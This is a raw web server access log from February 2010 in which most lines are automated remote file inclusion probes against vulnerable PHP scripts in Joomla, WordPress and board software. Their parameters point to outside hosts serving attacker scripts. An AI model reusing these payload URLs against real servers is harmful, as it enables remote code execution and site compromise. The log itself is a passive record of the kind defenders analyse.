208.43.13.149 - - [07/Feb/2010:12:07:07 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 302
208.43.13.149 - - [07/Feb/2010:12:07:08 -0500] "GET /log//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 306
220.73.144.196 - - [07/Feb/2010:12:10:38 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355
220.73.144.196 - - [07/Feb/2010:12:10:42 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355
210.116.103.118 - - [07/Feb/2010:12:10:53 -0500] "GET /log/sdaglobal.org-access_log.4//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 374
210.116.103.118 - - [07/Feb/2010:12:10:53 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 343
210.116.103.118 - - [07/Feb/2010:12:10:54 -0500] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 347
220.73.144.196 - - [07/Feb/2010:12:11:40 -0500] "GET /////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 335
220.73.144.196 - - [07/Feb/2010:12:11:40 -0500] "GET /log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 339
220.73.144.196 - - [07/Feb/2010:12:11:40 -0500] "GET /log/sdaglobal.org-access_log.1%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 368
210.127.209.105 - - [07/Feb/2010:12:11:46 -0500] "GET /log/sdaglobal.org-error_log.2%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 374
220.73.144.196 - - [07/Feb/2010:12:13:42 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355
208.43.13.149 - - [07/Feb/2010:12:15:06 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 302
208.43.13.149 - - [07/Feb/2010:12:15:07 -0500] "GET /log//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 306
220.73.144.196 - - [07/Feb/2010:12:17:14 -0500] "GET /log/sdaglobal.org-access_log.1/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 366
217.196.64.12 - - [07/Feb/2010:12:19:26 -0500] "GET /log/sdaglobal.org-access_log/includes/ktedit/ktedit.php?dirDepth=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt?? HTTP/1.1" 404 336
217.196.64.12 - - [07/Feb/2010:12:19:26 -0500] "GET /includes/ktedit/ktedit.php?dirDepth=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt?? HTTP/1.1" 404 307
217.196.64.12 - - [07/Feb/2010:12:19:26 -0500] "GET /log/includes/ktedit/ktedit.php?dirDepth=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt?? HTTP/1.1" 404 311
217.196.64.12 - - [07/Feb/2010:12:19:26 -0500] "GET /log/sdaglobal.org-error_log.1/includes/ktedit/ktedit.php?dirDepth=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt?? HTTP/1.1" 404 337
222.239.227.209 - - [07/Feb/2010:12:20:27 -0500] "GET /log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 341
222.239.227.209 - - [07/Feb/2010:12:20:27 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 370
222.239.227.209 - - [07/Feb/2010:12:20:28 -0500] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337
222.239.227.155 - - [07/Feb/2010:12:20:51 -0500] "GET /log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 341
222.239.227.155 - - [07/Feb/2010:12:20:51 -0500] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337
222.239.227.155 - - [07/Feb/2010:12:20:51 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 370
200.93.147.154 - - [07/Feb/2010:12:22:00 -0500] "GET //bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 301
200.93.147.154 - - [07/Feb/2010:12:22:00 -0500] "GET /log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 305
200.93.147.154 - - [07/Feb/2010:12:22:00 -0500] "GET /log/sdaglobal.org-error_log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 329
200.93.147.154 - - [07/Feb/2010:12:24:06 -0500] "GET /log/sdaglobal.org-error_log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 329
200.93.147.154 - - [07/Feb/2010:12:24:06 -0500] "GET //bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 301
200.93.147.154 - - [07/Feb/2010:12:24:06 -0500] "GET /log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 305
222.239.227.209 - - [07/Feb/2010:12:24:42 -0500] "GET /log/sdaglobal.org-access_log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 368
222.239.227.155 - - [07/Feb/2010:12:24:49 -0500] "GET /log/sdaglobal.org-access_log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 368
61.78.109.87 - - [07/Feb/2010:12:25:16 -0500] "GET //include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 301
61.78.109.87 - - [07/Feb/2010:12:25:17 -0500] "GET /log//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 305
61.78.109.87 - - [07/Feb/2010:12:25:29 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 334
210.116.103.118 - - [07/Feb/2010:12:28:20 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 376
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 354
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 358
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 383
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 358
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 383
218.38.136.126 - - [07/Feb/2010:12:28:36 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 354
202.150.132.139 - - [07/Feb/2010:12:29:59 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 343
202.150.132.139 - - [07/Feb/2010:12:29:59 -0500] "GET /log/sdaglobal.org-access_log.4//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 374
202.150.132.139 - - [07/Feb/2010:12:29:59 -0500] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 347
209.59.163.57 - - [07/Feb/2010:12:31:57 -0500] "GET /log/sdaglobal.org-access_log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 366
209.59.163.57 - - [07/Feb/2010:12:31:57 -0500] "GET ///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 337
209.59.163.57 - - [07/Feb/2010:12:31:57 -0500] "GET /log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 341
209.59.163.57 - - [07/Feb/2010:12:32:02 -0500] "GET ///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 337
209.59.163.57 - - [07/Feb/2010:12:32:03 -0500] "GET /log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 341
209.59.163.57 - - [07/Feb/2010:12:32:03 -0500] "GET /log/sdaglobal.org-access_log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 366
93.174.121.139 - - [07/Feb/2010:12:33:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 291
93.174.121.139 - - [07/Feb/2010:12:33:48 -0500] "GET /log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 295
93.174.121.139 - - [07/Feb/2010:12:33:48 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 324
93.174.121.139 - - [07/Feb/2010:12:37:20 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 324
93.174.121.139 - - [07/Feb/2010:12:40:42 -0500] "GET /log/sdaglobal.org-access_log.1//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 322
125.232.99.100 - - [07/Feb/2010:12:45:22 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
125.232.99.100 - - [07/Feb/2010:12:45:22 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
222.239.227.155 - - [07/Feb/2010:12:46:01 -0500] "GET /oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 300
222.239.227.155 - - [07/Feb/2010:12:46:01 -0500] "GET /log/oneadmin/config.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 304
110.45.145.178 - - [07/Feb/2010:12:46:01 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 313
110.45.145.178 - - [07/Feb/2010:12:46:01 -0500] "GET /log/sdaglobal.org-access_log.4//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 344
110.45.145.178 - - [07/Feb/2010:12:46:02 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317
110.45.145.178 - - [07/Feb/2010:12:46:29 -0500] "GET /log/sdaglobal.org-access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 342
110.45.145.178 - - [07/Feb/2010:12:47:47 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 313
110.45.145.178 - - [07/Feb/2010:12:47:47 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 317
110.45.145.178 - - [07/Feb/2010:12:47:47 -0500] "GET /log/sdaglobal.org-access_log.4//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 344
67.195.114.252 - - [07/Feb/2010:12:47:56 -0500] "GET /log/filipino.sdaglobal.org-access_log HTTP/1.0" 200 5468
110.45.145.178 - - [07/Feb/2010:12:48:12 -0500] "GET /log/sdaglobal.org-access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342
74.208.14.52 - - [07/Feb/2010:12:48:39 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 295
74.208.14.52 - - [07/Feb/2010:12:48:39 -0500] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 322
74.208.14.52 - - [07/Feb/2010:12:48:41 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 291
218.38.136.125 - - [07/Feb/2010:12:48:56 -0500] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 332
74.208.14.52 - - [07/Feb/2010:12:48:57 -0500] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 322
74.208.14.52 - - [07/Feb/2010:12:48:57 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 291
74.208.14.52 - - [07/Feb/2010:12:48:57 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 295
218.38.136.125 - - [07/Feb/2010:12:48:59 -0500] "GET /log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 336
218.38.136.125 - - [07/Feb/2010:12:49:00 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 365
74.208.14.52 - - [07/Feb/2010:12:50:13 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 324
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 291
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 322
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 291
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 295
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 322
211.60.28.10 - - [07/Feb/2010:12:50:45 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 295
110.45.145.178 - - [07/Feb/2010:12:51:26 -0500] "GET /log/sdaglobal.org-error_log.3/modifyform.html?code=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 326
110.45.145.178 - - [07/Feb/2010:12:51:27 -0500] "GET /modifyform.html?code=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 296
110.45.145.178 - - [07/Feb/2010:12:51:27 -0500] "GET /log/modifyform.html?code=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 300
74.208.14.52 - - [07/Feb/2010:12:51:28 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 324
74.208.14.52 - - [07/Feb/2010:12:52:12 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 291
74.208.14.52 - - [07/Feb/2010:12:52:12 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 295
74.208.14.52 - - [07/Feb/2010:12:52:12 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 324
74.208.14.52 - - [07/Feb/2010:12:52:25 -0500] "GET /log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 295
74.208.14.52 - - [07/Feb/2010:12:52:25 -0500] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 324
74.208.14.52 - - [07/Feb/2010:12:52:25 -0500] "GET //index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 291
66.249.65.235 - - [07/Feb/2010:12:55:35 -0500] "GET /images/bibuniv.gif HTTP/1.1" 304 -
200.93.147.154 - - [07/Feb/2010:13:00:41 -0500] "GET /log/sdaglobal.org-error_log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 355
200.93.147.154 - - [07/Feb/2010:13:00:41 -0500] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 329
200.93.147.154 - - [07/Feb/2010:13:00:44 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [07/Feb/2010:13:00:56 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 325
200.93.147.154 - - [07/Feb/2010:13:00:56 -0500] "GET /log/sdaglobal.org-error_log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 355
200.93.147.154 - - [07/Feb/2010:13:00:56 -0500] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 329
216.228.66.169 - - [07/Feb/2010:13:02:15 -0500] "GET /favicon.ico HTTP/1.1" 404 292
58.150.99.131 - - [07/Feb/2010:13:06:52 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 350
58.150.99.131 - - [07/Feb/2010:13:06:52 -0500] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 321
58.150.99.131 - - [07/Feb/2010:13:06:52 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 317
58.150.99.131 - - [07/Feb/2010:13:06:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 317
58.150.99.131 - - [07/Feb/2010:13:06:58 -0500] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 321
58.150.99.131 - - [07/Feb/2010:13:07:03 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 350
74.86.155.18 - - [07/Feb/2010:13:14:28 -0500] "GET ///nikolaj-valuev-vse-reshitsya-na-ringe/?dir_ws=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 321
74.86.155.18 - - [07/Feb/2010:13:14:29 -0500] "GET /log///nikolaj-valuev-vse-reshitsya-na-ringe/?dir_ws=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 325
74.86.155.18 - - [07/Feb/2010:13:14:29 -0500] "GET /log/sdaglobal.org-access_log///nikolaj-valuev-vse-reshitsya-na-ringe/?dir_ws=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 350
74.86.155.18 - - [07/Feb/2010:13:15:04 -0500] "GET /log/sdaglobal.org-access_log.4///nikolaj-valuev-vse-reshitsya-na-ringe/?dir_ws=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 352
222.96.156.164 - - [07/Feb/2010:13:16:58 -0500] "GET //?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 9426
222.96.156.164 - - [07/Feb/2010:13:16:59 -0500] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 313
222.96.156.164 - - [07/Feb/2010:13:16:59 -0500] "GET /log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 59646
211.115.213.195 - - [07/Feb/2010:13:18:50 -0500] "GET //?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 9426
211.115.213.195 - - [07/Feb/2010:13:18:51 -0500] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 313
211.115.213.195 - - [07/Feb/2010:13:18:51 -0500] "GET /log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 59646
211.115.213.195 - - [07/Feb/2010:13:19:06 -0500] "GET //?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 9426
211.115.213.195 - - [07/Feb/2010:13:19:06 -0500] "GET /log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 200 59646
211.115.213.195 - - [07/Feb/2010:13:19:08 -0500] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 313
211.115.213.195 - - [07/Feb/2010:13:28:00 -0500] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 311
211.115.213.195 - - [07/Feb/2010:13:28:07 -0500] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 311
222.96.156.164 - - [07/Feb/2010:13:28:21 -0500] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 311
61.78.109.87 - - [07/Feb/2010:13:31:44 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 350
61.78.109.87 - - [07/Feb/2010:13:31:46 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 317
